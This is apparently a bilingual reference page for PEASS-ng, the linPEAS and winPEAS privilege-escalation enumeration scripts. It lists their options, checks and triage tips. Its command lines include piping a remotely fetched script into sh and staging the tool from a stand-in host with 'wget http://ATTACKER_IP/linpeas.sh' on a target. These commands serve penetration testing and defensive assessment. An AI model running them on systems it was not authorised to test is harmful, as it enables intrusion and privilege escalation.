peass-ng
Suite de scripts d'escalade de privilèges (Privilege Escalation Awesome Scripts Suite) : énumération automatisée pour Linux (linPEAS) et Windows (winPEAS). Identifie automatiquement des centaines de vecteurs d'escalade de privilèges. Privilege Escalation Awesome Scripts Suite — automated privilege escalation enumeration for Linux (linPEAS) and Windows (winPEAS). Identifies hundreds of privilege escalation vectors automatically.
↗ https://github.com/carlospolop/PEASS-ngOverview
PEASS-ng (Privilege Escalation Awesome Scripts Suite) contains linPEAS and winPEAS — the gold standard automated privilege escalation enumeration scripts. They check hundreds of potential escalation paths, highlight findings by severity, and present results in color-coded output for quick review.
linPEAS — Linux Privilege Escalation
Download and run (remote)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Run from downloaded file
chmod +x linpeas.sh
./linpeas.sh
# Save output for offline review
./linpeas.sh | tee linpeas_output.txt
./linpeas.sh 2>/dev/null | tee linpeas_output.txt
Specific checks only
./linpeas.sh -o SysI,Devs,AvaSof,ProCronSrvcsTmrsSocks,Net,UsrI,SofI,IntFiles
linPEAS Key Checks
# Color coding:
# RED/YELLOW — 95% PE vector (critical finding)
# RED — Check if vulnerability exists
# Yellow — Configuration worth noting
# Green — User/pass/token pattern found
# Checks include:
# SUID/SGID binaries
# Sudo permissions (sudo -l)
# Cron jobs (especially writable scripts)
# Writable paths in $PATH
# Network services running as root
# Docker/LXC container escape vectors
# Kernel exploits (suggests based on version)
# Password files and credentials
# NFS shares with no_root_squash
winPEAS — Windows Privilege Escalation
# Download and run
Invoke-WebRequest -Uri "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe" -OutFile winpeas.exe
.\winpeas.exe
# Save output
.\winpeas.exe > winpeas_output.txt
# Run all checks
.\winpeas.exe all
# Specific check categories
.\winpeas.exe systeminfo
.\winpeas.exe windowscreds
.\winpeas.exe servicesinfo
.\winpeas.exe processinfo
winPEAS Key Findings
# Unquoted service paths
# Weak service permissions
# AlwaysInstallElevated
# Stored credentials (Windows Vault, DPAPI)
# Registry-stored passwords
# SAM database location
# Scheduled tasks with weak permissions
# AutoRun entries
# Token privileges (SeImpersonatePrivilege, etc.)
PEASS-ng Quick Tips
# linPEAS: save output and look for RED/YELLOW first
./linpeas.sh | tee output.txt
grep -A2 "95%" output.txt
cat output.txt | grep -E "^\033\[1;31m|\033\[0;31m" | head -30
# winPEAS: look for orange/red sections in output
# Key sections: SYSTEM INFO, USER INFO, SERVICES, PROCESSES, REGISTRY
python3 -m http.server 80 # On attacker
wget http://ATTACKER_IP/linpeas.sh # On target
Tips
- linPEAS is the most important post-exploitation script for Linux — run it immediately
- Prioritize RED/YELLOW findings — they are near-certain privilege escalation paths
- Save full output — review offline, as some findings need context
- If sudo is found (
sudo -l), check GTFOBins for exploitation - Token privileges (SeImpersonatePrivilege on Windows) → use Potato attacks
- Keep PEASS-ng updated — new vectors are added frequently
Help / Man page
linpeas.sh [options]
-h Help
-a All checks (thorough)
-s Very stealthy (slower)
-o CHECKS Specific check categories
-q Quiet output
-n No color
winpeas.exe [options]
all Run all checks
systeminfo System information
servicesinfo Services enumeration
windowscreds Credentials search
processinfo Process enumeration
applicationsinfo Installed applications
Vue d’ensemble
PEASS-ng (Privilege Escalation Awesome Scripts Suite) contient linPEAS et winPEAS, les scripts de référence pour l’énumération automatisée d’escalade de privilèges. Ils vérifient des centaines de chemins d’escalade potentiels, mettent en évidence les résultats par sévérité, et présentent les résultats avec un code couleur pour une revue rapide.
linPEAS : escalade de privilèges Linux
# Télécharger et exécuter (à distance)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Exécuter depuis le fichier téléchargé
chmod +x linpeas.sh
./linpeas.sh
# Sauvegarder la sortie pour une revue hors-ligne
./linpeas.sh | tee linpeas_output.txt
./linpeas.sh 2>/dev/null | tee linpeas_output.txt
# Vérifications spécifiques uniquement
./linpeas.sh -o SysI,Devs,AvaSof,ProCronSrvcsTmrsSocks,Net,UsrI,SofI,IntFiles
Vérifications clés de linPEAS
# Code couleur :
# ROUGE/JAUNE : vecteur de PE à 95 % (résultat critique)
# ROUGE : vérifier si la vulnérabilité existe
# Jaune : configuration à noter
# Vert : motif utilisateur/mot de passe/token trouvé
# Vérifications incluses :
# Binaires SUID/SGID
# Permissions sudo (sudo -l)
# Tâches cron (notamment les scripts modifiables en écriture)
# Chemins modifiables en écriture dans $PATH
# Services réseau tournant en root
# Vecteurs d'évasion de conteneur Docker/LXC
# Exploits kernel (suggérés selon la version)
# Fichiers de mots de passe et identifiants
# Partages NFS avec no_root_squash
winPEAS : escalade de privilèges Windows
# Télécharger et exécuter
Invoke-WebRequest -Uri "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe" -OutFile winpeas.exe
.\winpeas.exe
# Sauvegarder la sortie
.\winpeas.exe > winpeas_output.txt
# Exécuter toutes les vérifications
.\winpeas.exe all
# Catégories de vérifications spécifiques
.\winpeas.exe systeminfo
.\winpeas.exe windowscreds
.\winpeas.exe servicesinfo
.\winpeas.exe processinfo
Résultats clés de winPEAS
# Chemins de service non quotés
# Permissions de service faibles
# AlwaysInstallElevated
# Identifiants stockés (Windows Vault, DPAPI)
# Mots de passe stockés dans le registre
# Emplacement de la base SAM
# Tâches planifiées avec permissions faibles
# Entrées AutoRun
# Privilèges de token (SeImpersonatePrivilege, etc.)
Astuces rapides PEASS-ng
# linPEAS : sauvegarder la sortie et regarder d'abord les sections ROUGE/JAUNE
./linpeas.sh | tee output.txt
grep -A2 "95%" output.txt
cat output.txt | grep -E "^\033\[1;31m|\033\[0;31m" | head -30
# winPEAS : regarder les sections orange/rouge dans la sortie
# Sections clés : SYSTEM INFO, USER INFO, SERVICES, PROCESSES, REGISTRY
python3 -m http.server 80 # Sur l'attaquant
wget http://ATTACKER_IP/linpeas.sh # Sur la cible
Conseils
- linPEAS est le script de post-exploitation le plus important pour Linux : le lancer immédiatement
- Prioriser les résultats ROUGE/JAUNE, ce sont des chemins d’escalade de privilèges quasi certains
- Sauvegarder la sortie complète, la revoir hors ligne, car certains résultats nécessitent du contexte
- Si sudo est trouvé (
sudo -l), vérifier GTFOBins pour l’exploitation - Privilèges de token (SeImpersonatePrivilege sous Windows) → utiliser les attaques Potato
- Garder PEASS-ng à jour, de nouveaux vecteurs sont ajoutés fréquemment
Aide / Page de manuel
linpeas.sh [options]
-h Help
-a All checks (thorough)
-s Very stealthy (slower)
-o CHECKS Specific check categories
-q Quiet output
-n No color
winpeas.exe [options]
all Run all checks
systeminfo System information
servicesinfo Services enumeration
windowscreds Credentials search
processinfo Process enumeration
applicationsinfo Installed applications